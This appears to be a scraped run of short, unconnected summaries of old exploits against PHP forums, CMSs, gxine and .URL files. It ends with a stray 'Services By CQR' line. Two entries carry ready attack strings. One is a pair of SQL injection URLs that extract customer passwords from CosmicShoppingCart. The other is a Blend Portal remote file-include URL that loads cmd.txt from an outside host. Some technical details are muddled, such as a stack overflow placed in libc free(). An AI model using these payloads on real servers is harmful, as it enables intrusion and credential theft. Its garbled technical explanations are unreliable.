This exploit allows an attacker to execute arbitrary commands on a vulnerable server running TinyPHP forum version 3.6. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'uname' parameter of the 'profile.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious PHP code to the vulnerable server. The malicious code will be written to the server's log file, which can then be accessed by the attacker to execute arbitrary commands on the server.
Internet Shortcut URL Buffer Overflow Vulnerability is a buffer overflow vulnerability in the Internet Shortcut URL (BASEURL) field of the .URL file. An attacker can exploit this vulnerability by crafting a malicious .URL file with a specially crafted BASEURL field that contains more than 2083 characters. This will cause a buffer overflow, resulting in arbitrary code execution on the target system.
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'default_path' parameter in multiple scripts. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
This PoC exploits a buffer overflow vulnerability in the HTTP plugin of gxine 0.5.6. The vulnerability is triggered when a large amount of data is sent to the server. This causes a stack-based buffer overflow, which can be exploited to execute arbitrary code. The vulnerable code is located in the free() function of /lib/tls/libc.so.6. The backtrace of the vulnerable code is 0xb78eccc7 in free () from /lib/tls/libc.so.6, 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so, 0x41414141 in ?? (), 0xb7f42164 in ?? () from /usr/lib/libxine.so.1, 0x080b1810 in ?? (), 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1, 0xb7f3967f in ?? () from /usr/lib/libxine.so.1, 0x0877c084 in ?? (), 0x0930a931 in ?? (), 0x080880a2 in defs.3 (), 0xb0088478 in ?? () and 0x00000000 in ?? ().
gnopaste is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
Nukedit is a Free Content Management. An Unauthorized Admin Add Exploit exists if the register.asp page is enabled. This exploit allows an attacker to add an admin user to the system by filling out the form and submitting it.
This exploit allows an attacker to change the user password of a Speedy Forum user by submitting a form with the user's name, email, ID, country, password, and re-password. The form does not have any authentication or authorization checks, allowing an attacker to change the user's password without their knowledge.
Fastpublish CMS version 1.6.9.d is vulnerable to remote file include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
SQL injections have been found in CosmicShoppingCart, a PHP/MySQL e-commerce system. These injections could be exploited by users to retrieve the passwords of the admin. Examples of the injections are: cosmicshop/search.php?max=-1%20UNION%20SELECT%201,1,1,cust_password,1,1,1,1,1%20FROM%20custs/* and cosmicshop/search.php?max='2'%20UNION%20SELECT%20'a','a','a',cust_email,cust_password,'abc',1,'a','a'%20FROM%20custs--
This exploits works on Blend Portal <= 1.2.0 for phpBB 2.x. Succesful exploitation needs register_globals on & allow url_fopen on. GET -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]. EXAMPLE -> http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
Services By CQR